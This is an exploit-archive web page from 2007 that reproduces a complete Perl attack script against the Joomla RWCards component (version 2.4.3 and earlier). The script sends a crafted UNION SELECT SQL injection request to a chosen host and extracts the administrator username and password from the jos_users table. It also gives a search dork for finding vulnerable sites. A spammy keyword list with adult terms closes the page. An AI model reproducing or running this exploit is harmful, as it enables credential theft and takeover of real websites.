about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Joomla Component RWCards <= 2.4.3 Remote SQL Injection Exploit




2007-03-24 Joomla Component RWCards <= 2.4.3 Remote SQL Injection Exploit 
Rated as : Moderate Risk

#!/usr/bin/perl
#[Script Name: Joomla Component RWCards <= 2.4.3 Remote Blind SQL
Injection Exploit
#[Coded by   : ajann
#[Author     : ajann
#[Dork       : "index.php?option=com_rwcards"
#[Contact    : :(
#[S.Page     : http://www.weberr.de
#[$$         : Free
#[..         : ajann,Turkey

use IO::Socket;
if(@ARGV < 1){
print "
[========================================================================
[//  Joomla Component RWCards <= 2.4.3 Remote Blind SQL Injection
Exploit
[//                   Usage: exploit.pl [target]
[//                   Example: exploit.pl victim.com
[//                   Example: exploit.pl victim.com
[//                           Vuln&Exp : ajann
[========================================================================
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$file =
"/index.php?option=com_rwcards&task=listCards&category_id=";

print "Script <DIR> : ";
$dir = <STDIN>;
chop ($dir);

if ($dir =~ /exit/){
print "-- Exploit Failed[You Are Exited] \n";
exit();
}

if ($dir =~ /\//){}
else {
print "-- Exploit Failed[No DIR] \n";
exit();
 }


$target =
"-1'union%20select%201,2,03,4,concat(char(117,115,101,114,110,97,109,101,58),username,char(112,97,115,115,119,111,114,100,58),password),50,044,076,0678,07%20from%20jos_users/*";
$target = $host.$dir.$file.$target;

#Writing data to socket
print
"+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr
=> "$server", PeerPort => "$port") || die
"\n+ Connection failed...\n";
print $socket "GET $target HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /username:(.*?)pass/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Username: $1\n";
}

if ($answer =~ /password:(.*?)\">/){
print "+ Password: $1\n";
}

if ($answer =~ /Syntax error/) { 
print "+ Exploit Failed : ( \n";
print
"+**********************************************************************+\n";
exit(); 
}

if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : (  \n";
print
"+**********************************************************************+\n";
exit(); 
}
 }


securitydot.net - 2007-03-24

Advertising

Copyright 2007, SecurityDot
Mon, 09 Nov 2009 12:31:14 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.youtub www.263inf news for c WWW 98SEX www.huaian swMenuFree www.i232.c ttcms wwx.sex300 www.dljzsh adult vide www.yltgg. port 1126 wwwsexcom man to man man to man gadis smu netgear dg www.erotic www.shuang 89 com SEX MOVIS qarls sex Simran sex 4327654565 200 /media CHAINASEX cgi irc axis commu suphp ninetharas sql inject news for c www.domain jerseyshom sexgaymoiv imail 8.15 www.agilen www.jdsdjx port+32768 school.xye search/exp mambo Remo 2.4.20-46. allegro Www .vidio xxxactiont www.ksh5u. www sxs news for c